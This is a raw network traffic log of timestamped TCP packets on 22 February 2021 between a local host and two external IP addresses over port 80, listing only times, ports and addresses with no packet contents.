Feb 22, 2021 09:14:44.465024948 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.465044975 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.465074062 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.491161108 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.801043987 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.801090002 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.801119089 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.801198006 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.861335993 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.861396074 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.861423969 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.861445904 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.861469030 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.861493111 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.861496925 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.861530066 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.861706972 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.861740112 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.861789942 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.894989014 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895018101 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895041943 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895061970 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895082951 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895103931 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895194054 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.895248890 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.895328045 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895353079 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895370007 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895397902 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895409107 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.895421982 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895431042 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.895452023 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.895477057 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.896241903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.896265984 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.896294117 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.896310091 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:44.896331072 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:44.896461964 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.230602980 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.230633020 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.230662107 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.230756998 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.417254925 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.595907927 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.595963001 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.595990896 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.596023083 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.596052885 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.596081972 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.596120119 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.596204996 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.596236944 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.596263885 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.596484900 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.655833006 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.655885935 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.655916929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.655950069 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.655982971 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656014919 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656047106 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.656047106 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656068087 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.656083107 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656116009 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656119108 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.656835079 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656868935 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656899929 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656928062 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.656929016 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656939030 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.656959057 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.656990051 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.657000065 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.657718897 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.657749891 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.657851934 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.692312002 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692348003 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692385912 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692409992 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692445993 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692472935 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692543983 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.692667961 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692698002 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692722082 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.692725897 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692730904 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.692795992 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.692821026 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.692822933 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.693063974 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.717804909 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.717848063 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.717883110 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.717915058 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.717942953 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.717972040 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.718080044 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.718101025 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.718120098 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.718153000 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.718183994 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.718211889 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.718234062 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:45.718266964 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.718271017 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:45.917289972 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.047898054 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.047926903 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.047955036 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.047977924 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.047998905 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.048013926 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.048141956 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.048176050 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.048309088 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.048337936 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.048351049 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.048376083 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.048397064 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.048423052 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.048525095 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.048538923 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.049122095 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.049148083 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.049171925 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.049196959 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.049217939 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.049240112 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.049259901 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.049273014 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.049452066 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.079121113 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079150915 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079179049 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079204082 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079230070 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079250097 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079308987 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.079448938 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.079507113 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079526901 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079540014 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079551935 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079570055 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079576969 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.079773903 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.080368996 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.080408096 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.080528021 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.107285976 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107306957 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107331038 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107361078 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107378006 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107395887 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107450008 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.107502937 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.107512951 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.107641935 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107660055 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107692003 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107716084 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107741117 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107763052 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.107790947 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.107821941 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.107831001 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.108525038 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.108556986 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.109183073 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.138814926 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.138845921 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.138873100 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.138895988 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.138932943 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.138940096 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.139087915 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.139092922 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.139115095 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.139120102 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.139144897 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.139168978 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.139219999 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.139239073 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.139244080 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.139246941 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.139362097 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.140016079 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.140045881 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.140069008 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.140093088 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.140175104 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.140192032 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.462984085 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.463011980 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.463035107 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.463243008 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.521586895 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.521614075 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.521636963 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.521739960 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.521756887 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.521765947 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.521784067 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.521806955 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.521816015 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.521835089 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.521841049 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.521848917 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.521861076 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.521895885 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.552956104 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.552978039 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553009987 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553055048 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553076029 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553097963 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553134918 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.553188086 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.553198099 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.553492069 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553510904 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553538084 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553563118 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553584099 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553611040 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.553649902 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.553699017 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.553711891 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.554338932 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.554357052 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.554456949 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.586040974 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.586065054 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.586090088 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.586112022 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.586174011 CET	80	49767	104.21.71.230	192.168.2.4
Feb 22, 2021 09:14:46.586213112 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.586257935 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:46.643963099 CET	49767	80	192.168.2.4	104.21.71.230
Feb 22, 2021 09:14:47.755666018 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:47.803142071 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.178258896 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.178296089 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.178318024 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.178396940 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.233757019 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233779907 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233799934 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233839989 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233839989 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.233860016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233875990 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233897924 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233899117 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.233915091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233931065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233949900 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233968019 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.233977079 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.233983994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.234002113 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.234016895 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.234018087 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.234049082 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.354947090 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.567873001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.567923069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.567958117 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.567996025 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.642288923 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642357111 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642402887 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.642416000 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642468929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642527103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642529011 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.642580032 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.642581940 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642643929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642695904 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.642697096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642754078 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642806053 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.642811060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642870903 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642924070 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.642931938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.642997026 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.643050909 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.643065929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666318893 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666390896 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666445017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666471958 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.666500092 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666544914 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666573048 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.666593075 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.666595936 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666646957 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666703939 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666752100 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.666755915 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666841984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.666909933 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.666996002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.667164087 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.702312946 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702398062 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702477932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702483892 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.702539921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702584028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702606916 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702636957 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702712059 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702744007 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.702764034 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702806950 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702872038 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702912092 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702914953 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.702919960 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.702950001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702989101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.702992916 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.703051090 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:48.733185053 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733211040 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733222008 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:48.733237982 CET	80	49761	172.67.172.17	192.168.2.4
